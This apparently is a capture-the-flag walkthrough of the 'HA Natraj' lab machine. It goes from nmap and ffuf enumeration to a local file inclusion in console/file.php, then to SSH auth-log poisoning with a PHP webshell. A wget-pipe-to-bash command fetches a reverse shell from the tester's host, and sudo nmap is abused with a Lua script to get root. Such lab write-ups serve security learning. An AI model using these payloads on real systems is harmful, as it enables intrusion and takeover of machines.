Ha Natraj#
Enum#
nmap -Pn -sV -sC 192.168.185.80 -oN scans/nmap.initial
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 18:22 IST
Nmap scan report for 192.168.185.80
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
| 256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_ 256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA:Natraj
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
Found the console
directory
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-u "http://192.168.185.80/FUZZ" \
-mc all -fs 276
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.185.80/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 276
________________________________________________
[Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 35ms]
* FUZZ: images
[Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 30ms]
* FUZZ: console
:: Progress: [2798/30000] :: Job [1/1] :: 1282 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
There’s a file.php
in there
curl -i http://192.168.185.80/console/file.php
HTTP/1.1 200 OK
Date: Fri, 18 Aug 2023 17:30:37 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
LFI#
Which predictably has an LFI in the file param
curl -i http://192.168.185.80/console/file.php?file=../../../../../etc/passwd
HTTP/1.1 200 OK
Date: Fri, 18 Aug 2023 17:30:55 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1398
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/passwd|grep sh$
root:x:0:0:root:/root:/bin/bash
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
curl -s http://192.168.185.80/console/file.php?file=../../../../../etc/hosts
127.0.0.1 localhost
127.0.1.1 ubuntu
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Automating the exploration process
wfuzz -c -w ./lfi2.txt --hw 0 http://192.168.185.80/console/file.php?file=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.185.80/console/file.php?file=FUZZ
Total requests: 2292
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000018: 200 27 L 35 W 1398 Ch "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
000000016: 200 27 L 35 W 1398 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000092: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../etc/passwd"
000000084: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../etc/passwd"
000000078: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../etc/passwd"
000000076: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../etc/passwd"
000000074: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000072: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000069: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
000000116: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../../etc/passwd"
000000199: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../../etc/passwd"
000000198: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../../../etc/group"
000000241: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../etc/passwd"
000000240: 200 54 L 54 W 743 Ch "../../../../../../../../../../../etc/group"
000000226: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../etc/passwd"
000000224: 200 7 L 22 W 186 Ch "../../../../../../../../../../../../etc/hosts"
000000223: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../etc/group"
000000210: 200 27 L 35 W 1398 Ch "../../../../../../../../../../../../../etc/passwd"
000000209: 200 54 L 54 W 743 Ch "../../../../../../../../../../../../../etc/group"
000000253: 200 54 L 54 W 743 Ch "../../../../../../../../../../etc/group"
000000281: 200 27 L 35 W 1398 Ch "../../../../../../../../etc/passwd"
000000300: 200 27 L 35 W 1398 Ch "../../../../../../../etc/passwd"
000000295: 200 54 L 54 W 743 Ch "../../../../../../../etc/group"
000000280: 200 54 L 54 W 743 Ch "../../../../../../../../etc/group"
000000267: 200 27 L 35 W 1398 Ch "../../../../../../../../../etc/passwd"
000000266: 200 54 L 54 W 743 Ch "../../../../../../../../../etc/group"
000000254: 200 27 L 35 W 1398 Ch "../../../../../../../../../../etc/passwd"
000000337: 200 27 L 35 W 1398 Ch "../../../../../../etc/passwd&=%3C%3C%3C%3C"
000000335: 200 27 L 35 W 1398 Ch "../../../../../../etc/passwd"
000000334: 200 54 L 54 W 743 Ch "../../../../../../etc/group"
000000357: 200 27 L 35 W 1398 Ch "../../../../../etc/passwd"
000000390: 200 54 L 54 W 743 Ch "../../../../etc/group"
000000391: 200 27 L 35 W 1398 Ch "../../../../etc/passwd"
000000352: 200 54 L 54 W 743 Ch "../../../../../etc/group"
000000596: 200 27 L 35 W 1398 Ch "/./././././././././././etc/passwd"
000000583: 200 27 L 35 W 1398 Ch "/../../../../../../../../../../etc/passwd"
000000570: 200 27 L 35 W 1398 Ch "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
000000614: 200 27 L 35 W 1398 Ch "///////../../../etc/passwd"
000000701: 200 194 L 599 W 5574 Ch "/boot/grub/grub.cfg"
000000754: 200 31 L 197 W 1332 Ch "/etc/apache2/sites-enabled/000-default.conf"
000000750: 200 15 L 46 W 320 Ch "/etc/apache2/ports.conf"
000000749: 200 29 L 102 W 749 Ch "/etc/apache2/mods-enabled/status.conf"
000000747: 200 20 L 124 W 724 Ch "/etc/apache2/mods-enabled/negotiation.conf"
000000746: 200 251 L 1128 W 7676 Ch "/etc/apache2/mods-enabled/mime.conf"
000000744: 200 10 L 31 W 395 Ch "/etc/apache2/mods-enabled/deflate.conf"
000000743: 200 24 L 131 W 843 Ch "/etc/apache2/mods-enabled/alias.conf"
000000742: 200 85 L 442 W 3110 Ch "/etc/apache2/mods-available/ssl.conf"
000000745: 200 5 L 18 W 157 Ch "/etc/apache2/mods-enabled/dir.conf"
000000741: 200 32 L 139 W 1280 Ch "/etc/apache2/mods-available/setenvif.conf"
000000740: 200 27 L 139 W 822 Ch "/etc/apache2/mods-available/proxy.conf"
000000737: 200 5 L 18 W 157 Ch "/etc/apache2/mods-available/dir.conf"
000000739: 200 251 L 1128 W 7676 Ch "/etc/apache2/mods-available/mime.conf"
000000736: 200 10 L 31 W 395 Ch "/etc/apache2/mods-available/deflate.conf"
000000735: 200 96 L 392 W 3374 Ch "/etc/apache2/mods-available/autoindex.conf"
000000731: 200 47 L 227 W 1782 Ch "/etc/apache2/envvars"
000000724: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000712: 200 88 L 467 W 3028 Ch "/etc/adduser.conf"
000000788: 200 15 L 124 W 722 Ch "/etc/crontab"
000000804: 200 54 L 207 W 1735 Ch "/etc/dhcp/dhclient.conf"
000000803: 200 20 L 99 W 604 Ch "/etc/deluser.conf"
000000799: 200 33 L 165 W 1235 Ch "/etc/default/grub"
000000798: 200 1 L 1 W 11 Ch "/etc/debian_version"
000000797: 200 83 L 485 W 2969 Ch "/etc/debconf.conf"
000000777: 200 144 L 207 W 5889 Ch "/etc/ca-certificates.conf"
000000769: 200 71 L 329 W 2319 Ch "/etc/bash.bashrc"
000000765: 200 55 L 351 W 3018 Ch "/etc/apt/sources.list"
000000822: 200 8 L 43 W 280 Ch "/etc/fuse.conf"
000000830: 200 1 L 1 W 7 Ch "/etc/hostname"
000000829: 200 3 L 18 W 92 Ch "/etc/host.conf"
000000828: 200 138 L 819 W 4861 Ch "/etc/hdparm.conf"
000000825: 200 55 L 55 W 760 Ch "/etc/group-"
000000823: 200 54 L 54 W 743 Ch "/etc/group"
000000815: 200 11 L 81 W 625 Ch "/etc/fstab"
000000898: 200 10 L 57 W 411 Ch "/etc/hosts.allow"
000000899: 200 17 L 111 W 711 Ch "/etc/hosts.deny"
000000897: 200 7 L 22 W 186 Ch "/etc/hosts"
000000954: 200 36 L 114 W 703 Ch "/etc/logrotate.conf"
000000953: 200 341 L 1753 W 10550 Ch "/etc/login.defs"
000000949: 200 17 L 40 W 332 Ch "/etc/ldap/ldap.conf"
000000948: 200 2 L 2 W 34 Ch "/etc/ld.so.conf"
000000944: 200 1 L 3 W 17 Ch "/etc/issue.net"
000000946: 200 6 L 22 W 144 Ch "/etc/kernel-img.conf"
000000943: 200 2 L 5 W 24 Ch "/etc/issue"
000000939: 200 355 L 1050 W 8181 Ch "/etc/init.d/apache2"
000001006: 200 20 L 63 W 513 Ch "/etc/nsswitch.conf"
000000999: 200 2 L 12 W 91 Ch "/etc/networks"
000000998: 200 8 L 39 W 247 Ch "/etc/network/interfaces"
000000983: 200 33 L 198 W 2447 Ch "/etc/mtab"
000000976: 200 5 L 36 W 195 Ch "/etc/modules"
000000969: 200 131 L 715 W 5174 Ch "/etc/manpath.config"
000000962: 200 4 L 6 W 103 Ch "/etc/lsb-release"
000001010: 200 12 L 17 W 382 Ch "/etc/os-release"
000001014: 200 27 L 35 W 1398 Ch "/etc/passwd"
000000963: 200 543 L 1307 W 14867 Ch "/etc/ltrace.conf"
000001016: 200 28 L 38 W 1487 Ch "/etc/passwd-"
000001012: 200 15 L 59 W 552 Ch "/etc/pam.conf"
000001106: 200 122 L 802 W 4620 Ch "/etc/security/access.conf"
000001097: 200 40 L 117 W 887 Ch "/etc/rpc"
000001095: 200 17 L 111 W 701 Ch "/etc/resolv.conf"
000001069: 200 27 L 97 W 581 Ch "/etc/profile"
000001122: 200 11 L 70 W 419 Ch "/etc/security/sepermit.conf"
000001151: 200 122 L 396 W 3264 Ch "/etc/ssh/sshd_config"
000001146: 200 51 L 218 W 1580 Ch "/etc/ssh/ssh_config"
000001123: 200 65 L 412 W 2179 Ch "/etc/security/time.conf"
000001119: 200 73 L 499 W 2972 Ch "/etc/security/pam_env.conf"
000001116: 200 56 L 347 W 2150 Ch "/etc/security/limits.conf"
000001117: 200 28 L 217 W 1440 Ch "/etc/security/namespace.conf"
000001112: 200 106 L 663 W 3635 Ch "/etc/security/group.conf"
000001160: 200 77 L 339 W 2683 Ch "/etc/sysctl.conf"
000001173: 200 4 L 45 W 403 Ch "/etc/updatedb.conf"
000001169: 200 1 L 1 W 20 Ch "/etc/timezone"
000001161: 200 3 L 14 W 77 Ch "/etc/sysctl.d/10-console-messages.conf"
000001162: 200 12 L 69 W 509 Ch "/etc/sysctl.d/10-network-security.conf"
000001308: 200 1 L 6 W 134 Ch "/proc/cmdline"
000001314: 200 1 L 5 W 27 Ch "/proc/loadavg"
000001310: 200 57 L 112 W 533 Ch "/proc/devices"
000001322: 200 3 L 46 W 450 Ch "/proc/net/tcp"
000001326: 200 0 L 1 W 27 Ch "/proc/self/cmdline"
000001324: 200 5 L 16 W 116 Ch "/proc/partitions"
000001321: 200 3 L 33 W 384 Ch "/proc/net/route"
000001323: 200 2 L 28 W 256 Ch "/proc/net/udp"
000001320: 200 42 L 124 W 1113 Ch "/proc/net/fib_trie"
000001325: 200 233 L 1563 W 17181 Ch "/proc/sched_debug"
000001318: 200 2 L 15 W 158 Ch "/proc/net/arp"
000001319: 200 4 L 54 W 448 Ch "/proc/net/dev"
000001317: 200 33 L 198 W 2447 Ch "/proc/mounts"
000001316: 200 41 L 246 W 2119 Ch "/proc/modules"
000001313: 200 60 L 220 W 1586 Ch "/proc/ioports"
000001315: 200 48 L 140 W 1335 Ch "/proc/meminfo"
000001312: 200 68 L 393 W 3513 Ch "/proc/interrupts"
000001309: 200 28 L 196 W 1142 Ch "/proc/cpuinfo"
000001311: 200 32 L 58 W 383 Ch "/proc/filesystems"
000001443: 200 1 L 17 W 146 Ch "/proc/version"
000001442: 200 2 L 10 W 95 Ch "/proc/swaps"
000001440: 200 53 L 129 W 1260 Ch "/proc/self/status"
000001441: 200 9 L 302 W 774 Ch "/proc/stat"
000001439: 200 1 L 52 W 319 Ch "/proc/self/stat"
000001438: 200 2 L 15 W 158 Ch "/proc/self/net/arp"
000001437: 200 33 L 198 W 2447 Ch "/proc/self/mounts"
000001725: 200 4 L 36 W 1513 Ch "/usr/share/pixmaps/debian-logo.png"
000001722: 200 88 L 467 W 3028 Ch "/usr/share/adduser/adduser.conf"
000001824: 200 683 L 8253 W 64983 Ch "/var/log/auth.log"
000001827: 200 2686 L 32224 W 250978 Ch "/var/log/auth.log.1"
000002044: 200 0 L 1 W 1152 Ch "/var/run/utmp"
Couldn’t find a log file to poison on the usual webserver logs locations
for i in $(cat file);do echo ${i};curl -s http://192.168.185.80/console/file.php?file=${i} ;done
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
But the ssh one can be leveraged
ssh yaya@192.168.185.80
The authenticity of host '192.168.185.80 (192.168.185.80)' can't be established.
ED25519 key fingerprint is SHA256:oikisLZJ8r96QhcB1H0OEK18JfSIUhkZ4+MmhbRuA6Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.185.80' (ED25519) to the list of known hosts.
yaya@192.168.185.80's password:
Permission denied, please try again.
yaya@192.168.185.80's password:
Permission denied, please try again.
yaya@192.168.185.80's password:
curl http://192.168.185.80/console/file.php?file=/var/log/auth.log|tail
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 71650 0 71650 0 0 506k 0 --:--:-- --:--:-- --:--:-- 507k
Aug 18 11:28:01 ubuntu CRON[24623]: pam_unix(cron:session): session closed for user root
Aug 18 11:29:01 ubuntu CRON[24626]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 18 11:29:01 ubuntu CRON[24626]: pam_unix(cron:session): session closed for user root
Aug 18 11:30:01 ubuntu CRON[24629]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 18 11:30:01 ubuntu CRON[24629]: pam_unix(cron:session): session closed for user root
Aug 18 11:30:22 ubuntu sshd[24632]: Invalid user yaya from 192.168.45.227 port 56084
Aug 18 11:30:24 ubuntu sshd[24632]: pam_unix(sshd:auth): check pass; user unknown
Aug 18 11:30:24 ubuntu sshd[24632]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.45.227
Aug 18 11:30:26 ubuntu sshd[24632]: Failed password for invalid user yaya from 192.168.45.227 port 56084 ssh2
Aug 18 11:30:26 ubuntu sshd[24632]: Connection closed by invalid user yaya 192.168.45.227 port 56084 [preauth]
LFI to RCE through log file poisoning#
Uploading a php webshell into the ssh auth log
ssh '<?php echo system($_GET["cmd"]); ?>'@192.168.185.80
<?php system($_GET["cmd"]); ?>@192.168.185.80's password:
^C
Using the webshell to trigger a staged reverse shell, this was a bit of a trial and error process as the box does not have curl, this ended up working with wget
wget -O- http://192.168.45.218:9090/shell.sh|bash
curl 'http://192.168.168.80/console/file.php?file=../../../../../var/log/auth.log?cmd=wget%20-O-%20http://192.168.45.218:9090/shell.sh%7Cbash'
www-data having sudoer’s rules looks a bit weird to me but ok. We can restart the apache daemon.
sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/systemctl start apache2
(ALL) NOPASSWD: /bin/systemctl stop apache2
(ALL) NOPASSWD: /bin/systemctl restart apache2
Restart the server as Mahakal#
We also have access to modify the apache config
ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7254 Aug 20 10:36 /etc/apache2/apache2.conf
So let’s get a proper shell
┌──(blnkn㉿Kolossus)-[~]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.168.80] 54240
bash: cannot set terminal process group (545): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/console$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ole$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/console$ ^Z
[1]+ Stopped nc -lvnp 4242
┌──(blnkn㉿Kolossus)-[~]
└─$ stty raw -echo
┌──(blnkn㉿Kolossus)-[~]
└─$
nc -lvnp 4242
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@ubuntu:/var/www/html/console$ export TERM=screen
www-data@ubuntu:/var/www/html/console$ export SHELL=bash
www-data@ubuntu:/var/www/html/console$
www-data@ubuntu:/var/www/html/console$
Now we can use vim to modify the config to run the server as mahakal and restart the daemon
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
Makahal can run nmap as root
mahakal@ubuntu:/home/mahakal$ sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
Nmap privesc#
nmap is a gtfo bin and the sudo line has no restrictions
mahakal@ubuntu:/home/natraj$ TF=$(mktemp)
mahakal@ubuntu:/home/natraj$ echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/home/natraj$ cat $TF
os.execute("/bin/sh")
mahakal@ubuntu:/home/natraj$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-18 12:29 PDT
NSE: Warning: Loading '/tmp/tmp.7IIkq3SoTy' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) groups=0(root)